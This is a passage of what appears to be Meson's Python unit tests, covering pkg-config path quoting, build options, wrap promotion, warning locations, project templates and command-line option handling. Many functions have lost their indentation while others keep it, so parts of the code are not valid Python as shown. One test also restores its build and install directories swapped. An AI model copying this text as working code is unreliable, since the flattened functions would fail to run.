                for fname in glob(os.path.join(testdir, 'foo.*')):
                    if os.path.splitext(fname)[1] not in ['.c', '.h', '.in']:
                        os.unlink(fname)
    @skipIfNoPkgconfig
    @mock.patch.dict(os.environ)
    def test_pkgconfig_gen_escaping(self):
        '''
        Test that paths with spaces in the installation prefix survive
        pkgconfig file generation and come back correctly quoted.
        '''
        testdir = os.path.join(self.common_test_dir, '44 pkgconfig-gen')
        prefix = '/usr/with spaces'
        libdir = 'lib'
        self.init(testdir, extra_args=['--prefix=' + prefix,
                                       '--libdir=' + libdir])
        # Find foo dependency
        os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir
        env = get_fake_env(testdir, self.builddir, self.prefix)
        kwargs = {'required': True, 'silent': True}
        foo_dep = PkgConfigDependency('libfoo', env, kwargs)
        # Ensure link_args are properly quoted
        libdir = PurePath(prefix) / PurePath(libdir)
        link_args = ['-L' + libdir.as_posix(), '-lfoo']
        self.assertEqual(foo_dep.get_link_args(), link_args)
        # Ensure include args are properly quoted
        incdir = PurePath(prefix) / PurePath('include')
        cargs = ['-I' + incdir.as_posix(), '-DLIBFOO']
        # pkg-config and pkgconf do not emit the flags in the same order,
        # so compare sorted.
        self.assertEqual(sorted(foo_dep.get_compile_args()), sorted(cargs))
def test_array_option_change(self):
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': ['foo', 'bar'],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir)
original = get_opt()
self.assertDictEqual(original, expected)
expected['value'] = ['oink', 'boink']
self.setconf('-Dlist=oink,boink')
changed = get_opt()
self.assertEqual(changed, expected)
def test_array_option_bad_change(self):
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': ['foo', 'bar'],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir)
original = get_opt()
self.assertDictEqual(original, expected)
with self.assertRaises(subprocess.CalledProcessError):
self.setconf('-Dlist=bad')
changed = get_opt()
self.assertDictEqual(changed, expected)
def test_array_option_empty_equivalents(self):
"""Array options treat -Dopt=[] and -Dopt= as equivalent."""
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': [],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir, extra_args='-Dlist=')
original = get_opt()
self.assertDictEqual(original, expected)
def opt_has(self, name, value):
res = self.introspect('--buildoptions')
found = False
for i in res:
if i['name'] == name:
self.assertEqual(i['value'], value)
found = True
break
self.assertTrue(found, "Array option not found in introspect data.")
    def test_free_stringarray_setting(self):
        '''
        Test that a free-form (no fixed choices) string-array option can be
        set both with plain comma separation and with list syntax.
        '''
        testdir = os.path.join(self.common_test_dir, '40 options')
        self.init(testdir)
        self.opt_has('free_array_opt', [])
        self.setconf('-Dfree_array_opt=foo,bar', will_build=False)
        self.opt_has('free_array_opt', ['foo', 'bar'])
        # List syntax allows commas inside individual elements.
        self.setconf("-Dfree_array_opt=['a,b', 'c,d']", will_build=False)
        self.opt_has('free_array_opt', ['a,b', 'c,d'])
# When running under Travis Mac CI, the file updates seem to happen
# too fast so the timestamps do not get properly updated.
# Call this method before file operations in appropriate places
# to make things work.
def mac_ci_delay(self):
if is_osx() and is_ci():
import time
time.sleep(1)
    def test_options_with_choices_changing(self) -> None:
        """Detect when options like arrays or combos have their choices change."""
        testdir = Path(os.path.join(self.unit_test_dir, '84 change option choices'))
        options1 = str(testdir / 'meson_options.1.txt')
        options2 = str(testdir / 'meson_options.2.txt')

        # Test that old options are changed to the new defaults if they are not valid
        real_options = str(testdir / 'meson_options.txt')
        self.addCleanup(os.unlink, real_options)

        shutil.copy(options1, real_options)
        self.init(str(testdir))
        self.mac_ci_delay()
        # Swap in the options file with different choices; the rebuild must
        # notice and migrate invalid stored values to the new defaults.
        shutil.copy(options2, real_options)
        self.build()
        opts = self.introspect('--buildoptions')
        for item in opts:
            if item['name'] == 'combo':
                self.assertEqual(item['value'], 'b')
                self.assertEqual(item['choices'], ['b', 'c', 'd'])
            elif item['name'] == 'arr':
                self.assertEqual(item['value'], ['b'])
                self.assertEqual(item['choices'], ['b', 'c', 'd'])
        self.wipe()
        self.mac_ci_delay()

        # When the old options are valid they should remain
        shutil.copy(options1, real_options)
        # NOTE(review): this passes '-Darray=b,c' but the checks below look
        # for an option named 'arr' — confirm the option names agree with
        # the meson_options files.
        self.init(str(testdir), extra_args=['-Dcombo=c', '-Darray=b,c'])
        self.mac_ci_delay()
        shutil.copy(options2, real_options)
        self.build()
        opts = self.introspect('--buildoptions')
        for item in opts:
            if item['name'] == 'combo':
                self.assertEqual(item['value'], 'c')
                self.assertEqual(item['choices'], ['b', 'c', 'd'])
            elif item['name'] == 'arr':
                self.assertEqual(item['value'], ['b', 'c'])
                self.assertEqual(item['choices'], ['b', 'c', 'd'])
    def test_subproject_promotion(self):
        '''
        Test `meson wrap promote`: copying a nested subproject up into the
        top-level subprojects dir, including the ambiguous-name and
        explicit-path cases.
        '''
        testdir = os.path.join(self.unit_test_dir, '12 promote')
        # Work on a copy so the source tree is not modified.
        workdir = os.path.join(self.builddir, 'work')
        shutil.copytree(testdir, workdir)
        spdir = os.path.join(workdir, 'subprojects')
        s3dir = os.path.join(spdir, 's3')
        scommondir = os.path.join(spdir, 'scommon')
        self.assertFalse(os.path.isdir(s3dir))
        subprocess.check_call(self.wrap_command + ['promote', 's3'],
                              cwd=workdir,
                              stdout=subprocess.DEVNULL)
        self.assertTrue(os.path.isdir(s3dir))
        self.assertFalse(os.path.isdir(scommondir))
        # 'scommon' exists in more than one subproject, so promoting by bare
        # name must fail; an invalid path must fail too.
        self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'scommon'],
                                            cwd=workdir,
                                            stderr=subprocess.DEVNULL), 0)
        self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'invalid/path/to/scommon'],
                                            cwd=workdir,
                                            stderr=subprocess.DEVNULL), 0)
        self.assertFalse(os.path.isdir(scommondir))
        # Disambiguating with a full path works.
        subprocess.check_call(self.wrap_command + ['promote', 'subprojects/s2/subprojects/scommon'], cwd=workdir)
        self.assertTrue(os.path.isdir(scommondir))
        promoted_wrap = os.path.join(spdir, 'athing.wrap')
        self.assertFalse(os.path.isfile(promoted_wrap))
        subprocess.check_call(self.wrap_command + ['promote', 'athing'], cwd=workdir)
        self.assertTrue(os.path.isfile(promoted_wrap))
        # The promoted project tree must still configure and build.
        self.init(workdir)
        self.build()
    def test_subproject_promotion_wrap(self):
        '''
        Test `meson wrap promote` for .wrap files: an ambiguous bare name
        must fail, an explicit path must succeed.
        '''
        testdir = os.path.join(self.unit_test_dir, '44 promote wrap')
        # Work on a copy so the source tree is not modified.
        workdir = os.path.join(self.builddir, 'work')
        shutil.copytree(testdir, workdir)
        spdir = os.path.join(workdir, 'subprojects')
        ambiguous_wrap = os.path.join(spdir, 'ambiguous.wrap')
        self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'ambiguous'],
                                            cwd=workdir,
                                            stderr=subprocess.DEVNULL), 0)
        self.assertFalse(os.path.isfile(ambiguous_wrap))
        subprocess.check_call(self.wrap_command + ['promote', 'subprojects/s2/subprojects/ambiguous.wrap'], cwd=workdir)
        self.assertTrue(os.path.isfile(ambiguous_wrap))
    def test_warning_location(self):
        '''
        Test that warnings printed during configure carry the correct
        file:line location, for several warning sources and for different
        working directories.
        '''
        tdir = os.path.join(self.unit_test_dir, '22 warning location')
        out = self.init(tdir)
        for expected in [
            r'meson.build:4: WARNING: Keyword argument "link_with" defined multiple times.',
            r'sub' + os.path.sep + r'meson.build:3: WARNING: Keyword argument "link_with" defined multiple times.',
            r'meson.build:6: WARNING: a warning of some sort',
            r'sub' + os.path.sep + r'meson.build:4: WARNING: subdir warning',
            r'meson.build:7: WARNING: Module unstable-simd has no backwards or forwards compatibility and might not exist in future releases.',
            r"meson.build:11: WARNING: The variable(s) 'MISSING' in the input file 'conf.in' are not present in the given configuration data.",
            r'meson.build:1: WARNING: Passed invalid keyword argument "invalid".',
        ]:
            self.assertRegex(out, re.escape(expected))
        # The printed meson.build path must be relative to the working
        # directory meson was invoked from.
        for wd in [
            self.src_root,
            self.builddir,
            os.getcwd(),
        ]:
            self.new_builddir()
            out = self.init(tdir, workdir=wd)
            expected = os.path.join(relpath(tdir, self.src_root), 'meson.build')
            relwd = relpath(self.src_root, wd)
            if relwd != '.':
                expected = os.path.join(relwd, expected)
            expected = '\n' + expected + ':'
            self.assertIn(expected, out)
    def test_error_location_path(self):
        '''Test locations in meson errors contain correct paths'''
        # this list contains errors from all the different steps in the
        # lexer/parser/interpreter we have tests for.
        for (t, f) in [
            ('10 out of bounds', 'meson.build'),
            ('18 wrong plusassign', 'meson.build'),
            ('61 bad option argument', 'meson_options.txt'),
            ('102 subdir parse error', os.path.join('subdir', 'meson.build')),
            ('103 invalid option file', 'meson_options.txt'),
        ]:
            tdir = os.path.join(self.src_root, 'test cases', 'failing', t)
            # The reported path must be relative to the invocation directory.
            for wd in [
                self.src_root,
                self.builddir,
                os.getcwd(),
            ]:
                try:
                    self.init(tdir, workdir=wd)
                except subprocess.CalledProcessError as e:
                    expected = os.path.join('test cases', 'failing', t, f)
                    relwd = relpath(self.src_root, wd)
                    if relwd != '.':
                        expected = os.path.join(relwd, expected)
                    expected = '\n' + expected + ':'
                    self.assertIn(expected, e.output)
                else:
                    # These are failing tests: a clean configure is a bug.
                    self.fail('configure unexpectedly succeeded')
def test_permitted_method_kwargs(self):
tdir = os.path.join(self.unit_test_dir, '25 non-permitted kwargs')
out = self.init(tdir)
for expected in [
r'WARNING: Passed invalid keyword argument "prefixxx".',
r'WARNING: Passed invalid keyword argument "argsxx".',
r'WARNING: Passed invalid keyword argument "invalidxx".',
]:
self.assertRegex(out, re.escape(expected))
    def test_templates(self):
        '''
        Test `meson init` project templates: for every language with a
        working compiler, generate a project in an empty directory and
        build it, and (for some languages) initialize from an existing
        source file with `meson init -b`.
        '''
        ninja = detect_ninja()
        if ninja is None:
            raise unittest.SkipTest('This test currently requires ninja. Fix this once "meson build" works.')

        langs = ['c']
        env = get_fake_env()
        # Probe which languages actually have a usable compiler here.
        for l in ['cpp', 'cs', 'd', 'java', 'cuda', 'fortran', 'objc', 'objcpp', 'rust']:
            try:
                comp = env.detect_compiler_for(l, MachineChoice.HOST)
                with tempfile.TemporaryDirectory() as d:
                    comp.sanity_check(d, env)
                langs.append(l)
            except EnvironmentException:
                pass
        # The D template fails under mac CI and we don't know why.
        # Patches welcome
        if is_osx():
            langs = [l for l in langs if l != 'd']

        for lang in langs:
            for target_type in ('executable', 'library'):
                # test empty directory
                with tempfile.TemporaryDirectory() as tmpdir:
                    self._run(self.meson_command + ['init', '--language', lang, '--type', target_type],
                              workdir=tmpdir)
                    self._run(self.setup_command + ['--backend=ninja', 'builddir'],
                              workdir=tmpdir)
                    self._run(ninja,
                              workdir=os.path.join(tmpdir, 'builddir'))
            # test directory with existing code file
            if lang in {'c', 'cpp', 'd'}:
                with tempfile.TemporaryDirectory() as tmpdir:
                    with open(os.path.join(tmpdir, 'foo.' + lang), 'w') as f:
                        f.write('int main(void) {}')
                    self._run(self.meson_command + ['init', '-b'], workdir=tmpdir)
            elif lang in {'java'}:
                with tempfile.TemporaryDirectory() as tmpdir:
                    with open(os.path.join(tmpdir, 'Foo.' + lang), 'w') as f:
                        f.write('public class Foo { public static void main() {} }')
                    self._run(self.meson_command + ['init', '-b'], workdir=tmpdir)
def test_compiler_run_command(self):
'''
The test checks that the compiler object can be passed to
run_command().
'''
testdir = os.path.join(self.unit_test_dir, '24 compiler run_command')
self.init(testdir)
def test_identical_target_name_in_subproject_flat_layout(self):
'''
Test that identical targets in different subprojects do not collide
if layout is flat.
'''
testdir = os.path.join(self.common_test_dir, '172 identical target name in subproject flat layout')
self.init(testdir, extra_args=['--layout=flat'])
self.build()
def test_identical_target_name_in_subdir_flat_layout(self):
'''
Test that identical targets in different subdirs do not collide
if layout is flat.
'''
testdir = os.path.join(self.common_test_dir, '181 same target name flat layout')
self.init(testdir, extra_args=['--layout=flat'])
self.build()
def test_flock(self):
exception_raised = False
with tempfile.TemporaryDirectory() as tdir:
os.mkdir(os.path.join(tdir, 'meson-private'))
with BuildDirLock(tdir):
try:
with BuildDirLock(tdir):
pass
except MesonException:
exception_raised = True
self.assertTrue(exception_raised, 'Double locking did not raise exception.')
    @unittest.skipIf(is_osx(), 'Test not applicable to OSX')
    def test_check_module_linking(self):
        """
        Test that link_with: a shared module issues a warning
        https://github.com/mesonbuild/meson/issues/2865
        (That an error is raised on OSX is exercised by test failing/78)
        """
        tdir = os.path.join(self.unit_test_dir, '30 shared_mod linking')
        out = self.init(tdir)
        msg = ('WARNING: target links against shared modules. This is not '
               'recommended as it is not supported on some platforms')
        self.assertIn(msg, out)
def test_ndebug_if_release_disabled(self):
testdir = os.path.join(self.unit_test_dir, '28 ndebug if-release')
self.init(testdir, extra_args=['--buildtype=release', '-Db_ndebug=if-release'])
self.build()
exe = os.path.join(self.builddir, 'main')
self.assertEqual(b'NDEBUG=1', subprocess.check_output(exe).strip())
def test_ndebug_if_release_enabled(self):
testdir = os.path.join(self.unit_test_dir, '28 ndebug if-release')
self.init(testdir, extra_args=['--buildtype=debugoptimized', '-Db_ndebug=if-release'])
self.build()
exe = os.path.join(self.builddir, 'main')
self.assertEqual(b'NDEBUG=0', subprocess.check_output(exe).strip())
def test_guessed_linker_dependencies(self):
'''
Test that meson adds dependencies for libraries based on the final
linker command line.
'''
testdirbase = os.path.join(self.unit_test_dir, '29 guessed linker dependencies')
testdirlib = os.path.join(testdirbase, 'lib')
extra_args = None
libdir_flags = ['-L']
env = get_fake_env(testdirlib, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() in {'msvc', 'clang-cl', 'intel-cl'}:
# msvc-like compiler, also test it with msvc-specific flags
libdir_flags += ['/LIBPATH:', '-LIBPATH:']
else:
# static libraries are not linkable with -l with msvc because meson installs them
# as .a files which unix_args_to_native will not know as it expects libraries to use
# .lib as extension. For a DLL the import library is installed as .lib. Thus for msvc
# this tests needs to use shared libraries to test the path resolving logic in the
# dependency generation code path.
extra_args = ['--default-library', 'static']
initial_builddir = self.builddir
initial_installdir = self.installdir
for libdir_flag in libdir_flags:
# build library
self.new_builddir()
self.init(testdirlib, extra_args=extra_args)
self.build()
self.install()
libbuilddir = self.builddir
installdir = self.installdir
libdir = os.path.join(self.installdir, self.prefix.lstrip('/').lstrip('\\'), 'lib')
# build user of library
self.new_builddir()
# replace is needed because meson mangles platform paths passed via LDFLAGS
self.init(os.path.join(testdirbase, 'exe'),
override_envvars={"LDFLAGS": '{}{}'.format(libdir_flag, libdir.replace('\\', '/'))})
self.build()
self.assertBuildIsNoop()
# rebuild library
exebuilddir = self.builddir
self.installdir = installdir
self.builddir = libbuilddir
# Microsoft's compiler is quite smart about touching import libs on changes,
# so ensure that there is actually a change in symbols.
self.setconf('-Dmore_exports=true')
self.build()
self.install()
# no ensure_backend_detects_changes needed because self.setconf did that already
# assert user of library will be rebuild
self.builddir = exebuilddir
self.assertRebuiltTarget('app')
# restore dirs for the next test case
self.installdir = initial_builddir
self.builddir = initial_installdir
def test_conflicting_d_dash_option(self):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
with self.assertRaises((subprocess.CalledProcessError, RuntimeError)) as e:
self.init(testdir, extra_args=['-Dbindir=foo', '--bindir=bar'])
# Just to ensure that we caught the correct error
self.assertIn('as both', e.stderr)
def _test_same_option_twice(self, arg, args):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
self.init(testdir, extra_args=args)
opts = self.introspect('--buildoptions')
for item in opts:
if item['name'] == arg:
self.assertEqual(item['value'], 'bar')
return
raise Exception(f'Missing {arg} value?')
def test_same_dash_option_twice(self):
self._test_same_option_twice('bindir', ['--bindir=foo', '--bindir=bar'])
def test_same_d_option_twice(self):
self._test_same_option_twice('bindir', ['-Dbindir=foo', '-Dbindir=bar'])
def test_same_project_d_option_twice(self):
self._test_same_option_twice('one', ['-Done=foo', '-Done=bar'])
def _test_same_option_twice_configure(self, arg, args):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
self.init(testdir)
self.setconf(args)
opts = self.introspect('--buildoptions')
for item in opts:
if item['name'] == arg:
self.assertEqual(item['value'], 'bar')
return
raise Exception(f'Missing {arg} value?')
def test_same_dash_option_twice_configure(self):
self._test_same_option_twice_configure(
'bindir', ['--bindir=foo', '--bindir=bar'])
def test_same_d_option_twice_configure(self):
self._test_same_option_twice_configure(
'bindir', ['-Dbindir=foo', '-Dbindir=bar'])
def test_same_project_d_option_twice_configure(self):
self._test_same_option_twice_configure(
'one', ['-Done=foo', '-Done=bar'])
    def test_command_line(self):
        '''
        Exercise command-line option handling end to end: defaults,
        --warnlevel vs -Dwarning_level, forbidden mixing of --opt and
        -Dopt, subproject options, split_args parsing of c_args, and
        last-value-wins when an option is repeated.
        '''
        testdir = os.path.join(self.unit_test_dir, '34 command line')

        # Verify default values when passing no args that affect the
        # configuration, and as a bonus, test that --profile-self works.
        out = self.init(testdir, extra_args=['--profile-self', '--fatal-meson-warnings'])
        self.assertNotIn('[default: true]', out)
        obj = mesonbuild.coredata.load(self.builddir)
        self.assertEqual(obj.options[OptionKey('default_library')].value, 'static')
        self.assertEqual(obj.options[OptionKey('warning_level')].value, '1')
        self.assertEqual(obj.options[OptionKey('set_sub_opt')].value, True)
        self.assertEqual(obj.options[OptionKey('subp_opt', 'subp')].value, 'default3')
        self.wipe()

        # warning_level is special, it's --warnlevel instead of --warning-level
        # for historical reasons
        self.init(testdir, extra_args=['--warnlevel=2', '--fatal-meson-warnings'])
        obj = mesonbuild.coredata.load(self.builddir)
        self.assertEqual(obj.options[OptionKey('warning_level')].value, '2')
        self.setconf('--warnlevel=3')
        obj = mesonbuild.coredata.load(self.builddir)
        self.assertEqual(obj.options[OptionKey('warning_level')].value, '3')
        self.wipe()

        # But when using -D syntax, it should be 'warning_level'
        self.init(testdir, extra_args=['-Dwarning_level=2', '--fatal-meson-warnings'])
        obj = mesonbuild.coredata.load(self.builddir)
        self.assertEqual(obj.options[OptionKey('warning_level')].value, '2')
        self.setconf('-Dwarning_level=3')
        obj = mesonbuild.coredata.load(self.builddir)
        self.assertEqual(obj.options[OptionKey('warning_level')].value, '3')
        self.wipe()

        # Mixing --option and -Doption is forbidden
        with self.assertRaises((subprocess.CalledProcessError, RuntimeError)) as cm:
            self.init(testdir, extra_args=['--warnlevel=1', '-Dwarning_level=3'])
        if isinstance(cm.exception, subprocess.CalledProcessError):
            self.assertNotEqual(0, cm.exception.returncode)
            self.assertIn('as both', cm.exception.output)
        else:
            self.assertIn('as both', str(cm.exception))
        self.init(testdir)
        with self.assertRaises((subprocess.CalledProcessError, RuntimeError)) as cm:
            self.setconf(['--warnlevel=1', '-Dwarning_level=3'])
        if isinstance(cm.exception, subprocess.CalledProcessError):
            self.assertNotEqual(0, cm.exception.returncode)
            self.assertIn('as both', cm.exception.output)
        else:
            self.assertIn('as both', str(cm.exception))
        self.wipe()

        # --default-library should override default value from project()
        self.init(testdir, extra_args=['--default-library=both', '--fatal-meson-warnings'])
        obj = mesonbuild.coredata.load(self.builddir)
        self.assertEqual(obj.options[OptionKey('default_library')].value, 'both')
        self.setconf('--default-library=shared')
        obj = mesonbuild.coredata.load(self.builddir)
        self.assertEqual(obj.options[OptionKey('default_library')].value, 'shared')
        if self.backend is Backend.ninja:
            # reconfigure target works only with ninja backend
            self.build('reconfigure')
            obj = mesonbuild.coredata.load(self.builddir)
            self.assertEqual(obj.options[OptionKey('default_library')].value, 'shared')
        self.wipe()

        # Should warn on unknown options
        out = self.init(testdir, extra_args=['-Dbad=1', '-Dfoo=2', '-Dwrong_link_args=foo'])
        self.assertIn('Unknown options: "bad, foo, wrong_link_args"', out)
        self.wipe()

        # Should fail on malformed option
        msg = "Option 'foo' must have a value separated by equals sign."
        with self.assertRaises((subprocess.CalledProcessError, RuntimeError)) as cm:
            self.init(testdir, extra_args=['-Dfoo'])
        if isinstance(cm.exception, subprocess.CalledProcessError):
            self.assertNotEqual(0, cm.exception.returncode)
            self.assertIn(msg, cm.exception.output)
        else:
            self.assertIn(msg, str(cm.exception))
        self.init(testdir)
        with self.assertRaises((subprocess.CalledProcessError, RuntimeError)) as cm:
            self.setconf('-Dfoo')
        if isinstance(cm.exception, subprocess.CalledProcessError):
            self.assertNotEqual(0, cm.exception.returncode)
            self.assertIn(msg, cm.exception.output)
        else:
            self.assertIn(msg, str(cm.exception))
        self.wipe()

        # It is not an error to set wrong option for unknown subprojects or
        # language because we don't have control on which one will be selected.
        self.init(testdir, extra_args=['-Dc_wrong=1', '-Dwrong:bad=1', '-Db_wrong=1'])
        self.wipe()

        # Test we can set subproject option
        self.init(testdir, extra_args=['-Dsubp:subp_opt=foo', '--fatal-meson-warnings'])
        obj = mesonbuild.coredata.load(self.builddir)
        self.assertEqual(obj.options[OptionKey('subp_opt', 'subp')].value, 'foo')
        self.wipe()

        # c_args value should be parsed with split_args
        self.init(testdir, extra_args=['-Dc_args=-Dfoo -Dbar "-Dthird=one two"', '--fatal-meson-warnings'])
        obj = mesonbuild.coredata.load(self.builddir)
        self.assertEqual(obj.options[OptionKey('args', lang='c')].value, ['-Dfoo', '-Dbar', '-Dthird=one two'])

        self.setconf('-Dc_args="foo bar" one two')
        obj = mesonbuild.coredata.load(self.builddir)
        self.assertEqual(obj.options[OptionKey('args', lang='c')].value, ['foo bar', 'one', 'two'])
        self.wipe()

        self.init(testdir, extra_args=['-Dset_percent_opt=myoption%', '--fatal-meson-warnings'])
        obj = mesonbuild.coredata.load(self.builddir)
        self.assertEqual(obj.options[OptionKey('set_percent_opt')].value, 'myoption%')
        self.wipe()

        # Setting a 2nd time the same option should override the first value
        try:
            self.init(testdir, extra_args=['--bindir=foo', '--bindir=bar',
                                           '-Dbuildtype=plain', '-Dbuildtype=release',
                                           '-Db_sanitize=address', '-Db_sanitize=thread',
                                           '-Dc_args=-Dfoo', '-Dc_args=-Dbar',
                                           '-Db_lundef=false', '--fatal-meson-warnings'])
            obj = mesonbuild.coredata.load(self.builddir)
            self.assertEqual(obj.options[OptionKey('bindir')].value, 'bar')
            self.assertEqual(obj.options[OptionKey('buildtype')].value, 'release')
            self.assertEqual(obj.options[OptionKey('b_sanitize')].value, 'thread')
            self.assertEqual(obj.options[OptionKey('args', lang='c')].value, ['-Dbar'])
            self.setconf(['--bindir=bar', '--bindir=foo',
                          '-Dbuildtype=release', '-Dbuildtype=plain',
                          '-Db_sanitize=thread', '-Db_sanitize=address',
                          '-Dc_args=-Dbar', '-Dc_args=-Dfoo'])
            obj = mesonbuild.coredata.load(self.builddir)
            self.assertEqual(obj.options[OptionKey('bindir')].value, 'foo')
            self.assertEqual(obj.options[OptionKey('buildtype')].value, 'plain')
            self.assertEqual(obj.options[OptionKey('b_sanitize')].value, 'address')
            self.assertEqual(obj.options[OptionKey('args', lang='c')].value, ['-Dfoo'])
            self.wipe()
        except KeyError:
            # Ignore KeyError, it happens on CI for compilers that does not
            # support b_sanitize. We have to test with a base option because
            # they used to fail this test with Meson 0.46 an earlier versions.
            pass
    def test_warning_level_0(self):
        '''
        Test that a project default of warning_level 0 is honoured and can
        still be overridden from the command line and at reconfigure time.
        '''
        testdir = os.path.join(self.common_test_dir, '207 warning level 0')

        # Verify default values when passing no args
        self.init(testdir)
        obj = mesonbuild.coredata.load(self.builddir)
        self.assertEqual(obj.options[OptionKey('warning_level')].value, '0')
        self.wipe()

        # verify we can override w/ --warnlevel
        self.init(testdir, extra_args=['--warnlevel=1'])
        obj = mesonbuild.coredata.load(self.builddir)
        self.assertEqual(obj.options[OptionKey('warning_level')].value, '1')
        self.setconf('--warnlevel=0')
        obj = mesonbuild.coredata.load(self.builddir)
        self.assertEqual(obj.options[OptionKey('warning_level')].value, '0')
        self.wipe()

        # verify we can override w/ -Dwarning_level
        self.init(testdir, extra_args=['-Dwarning_level=1'])
        obj = mesonbuild.coredata.load(self.builddir)
        self.assertEqual(obj.options[OptionKey('warning_level')].value, '1')
        self.setconf('-Dwarning_level=0')
        obj = mesonbuild.coredata.load(self.builddir)
        self.assertEqual(obj.options[OptionKey('warning_level')].value, '0')
        self.wipe()
    def test_feature_check_usage_subprojects(self):
        '''
        Test FeatureNew/FeatureDeprecated warnings in the presence of
        subprojects: each project warns against its own meson_version, and
        subproject warnings are prefixed with '| '.
        '''
        testdir = os.path.join(self.unit_test_dir, '41 featurenew subprojects')
        out = self.init(testdir)
        # Parent project warns correctly
        self.assertRegex(out, "WARNING: Project targeting '>=0.45'.*'0.47.0': dict")
        # Subprojects warn correctly
        self.assertRegex(out, r"\| WARNING: Project targeting '>=0.40'.*'0.44.0': disabler")
        self.assertRegex(out, r"\| WARNING: Project targeting '!=0.40'.*'0.44.0': disabler")
        # Subproject has a new-enough meson_version, no warning
        self.assertNotRegex(out, "WARNING: Project targeting.*Python")
        # Ensure a summary is printed in the subproject and the outer project
        self.assertRegex(out, r"\| WARNING: Project specifies a minimum meson_version '>=0.40'")
        self.assertRegex(out, r"\| \* 0.44.0: {'disabler'}")
        self.assertRegex(out, "WARNING: Project specifies a minimum meson_version '>=0.45'")
        self.assertRegex(out, " * 0.47.0: {'dict'}")
    def test_configure_file_warnings(self):
        '''
        Test the warnings emitted by configure_file(): missing variables,
        empty configuration data, and output files that overwrite each
        other.
        '''
        testdir = os.path.join(self.common_test_dir, "14 configure file")
        out = self.init(testdir)
        self.assertRegex(out, "WARNING:.*'empty'.*config.h.in.*not present.*")
        self.assertRegex(out, "WARNING:.*'FOO_BAR'.*nosubst-nocopy2.txt.in.*not present.*")
        self.assertRegex(out, "WARNING:.*'empty'.*config.h.in.*not present.*")
        self.assertRegex(out, "WARNING:.*empty configuration_data.*test.py.in")
        # Warnings for configuration files that are overwritten.
        self.assertRegex(out, "WARNING:.*\"double_output.txt\".*overwrites")
        self.assertRegex(out, "WARNING:.*\"subdir.double_output2.txt\".*overwrites")
        self.assertNotRegex(out, "WARNING:.*no_write_conflict.txt.*overwrites")
        self.assertNotRegex(out, "WARNING:.*@BASENAME@.*overwrites")
        self.assertRegex(out, "WARNING:.*\"sameafterbasename\".*overwrites")
        # No warnings about empty configuration data objects passed to files with substitutions
        self.assertNotRegex(out, "WARNING:.*empty configuration_data.*nosubst-nocopy1.txt.in")
        self.assertNotRegex(out, "WARNING:.*empty configuration_data.*nosubst-nocopy2.txt.in")
        # Check the generated file contents as well.
        with open(os.path.join(self.builddir, 'nosubst-nocopy1.txt'), 'rb') as f:
            self.assertEqual(f.read().strip(), b'/* #undef FOO_BAR */')
        with open(os.path.join(self.builddir, 'nosubst-nocopy2.txt'), 'rb') as f:
            self.assertEqual(f.read().strip(), b'')
        self.assertRegex(out, r"DEPRECATION:.*\['array'\] is invalid.*dict")
def test_dirs(self):
with tempfile.TemporaryDirectory() as containing:
with tempfile.TemporaryDirectory(dir=containing) as srcdir:
mfile = os.path.join(srcdir, 'meson.build')
of = open(mfile, 'w')
of.write("project('foobar', 'c')\n")
of.close()
pc = subprocess.run(self.setup_command,
cwd=srcdir,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL)
self.assertIn(b'Must specify at least one directory name', pc.stdout)
with tempfile.TemporaryDirectory(dir=srcdir) as builddir:
subprocess.run(self.setup_command,
check=True,
cwd=builddir,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
def get_opts_as_dict(self):
result = {}
for i in self.introspect('--buildoptions'):
result[i['name']] = i['value']
return result
    def test_buildtype_setting(self):
        '''
        Test that changing debug/optimization independently does not change
        the reported buildtype.
        '''
        testdir = os.path.join(self.common_test_dir, '1 trivial')
        self.init(testdir)
        opts = self.get_opts_as_dict()
        self.assertEqual(opts['buildtype'], 'debug')
        self.assertEqual(opts['debug'], True)
        self.setconf('-Ddebug=false')
        opts = self.get_opts_as_dict()
        self.assertEqual(opts['debug'], False)
        # buildtype stays 'debug' even though the debug flag changed.
        self.assertEqual(opts['buildtype'], 'debug')
        self.assertEqual(opts['optimization'], '0')
        self.setconf('-Doptimization=g')
        opts = self.get_opts_as_dict()
        self.assertEqual(opts['debug'], False)
        self.assertEqual(opts['buildtype'], 'debug')
        self.assertEqual(opts['optimization'], 'g')
    @skipIfNoPkgconfig
    @unittest.skipIf(is_windows(), 'Help needed with fixing this test on windows')
    def test_native_dep_pkgconfig(self):
        '''
        Test that native: true dependencies use the build machine's
        pkg-config (set via the [binaries] cross-file section) while host
        dependencies use the cross pkg-config.
        '''
        testdir = os.path.join(self.unit_test_dir,
                               '46 native dep pkgconfig var')
        with tempfile.NamedTemporaryFile(mode='w', delete=False) as crossfile:
            crossfile.write(textwrap.dedent(
                '''[binaries]
                pkgconfig = '{}'

                [properties]

                [host_machine]
                system = 'linux'
                cpu_family = 'arm'
                cpu = 'armv7'
                endian = 'little'
                '''.format(os.path.join(testdir, 'cross_pkgconfig.py'))))
            crossfile.flush()
            self.meson_cross_file = crossfile.name

        env = {'PKG_CONFIG_LIBDIR': os.path.join(testdir,
                                                 'native_pkgconfig')}
        self.init(testdir, extra_args=['-Dstart_native=false'], override_envvars=env)
        self.wipe()
        self.init(testdir, extra_args=['-Dstart_native=true'], override_envvars=env)
    @skipIfNoPkgconfig
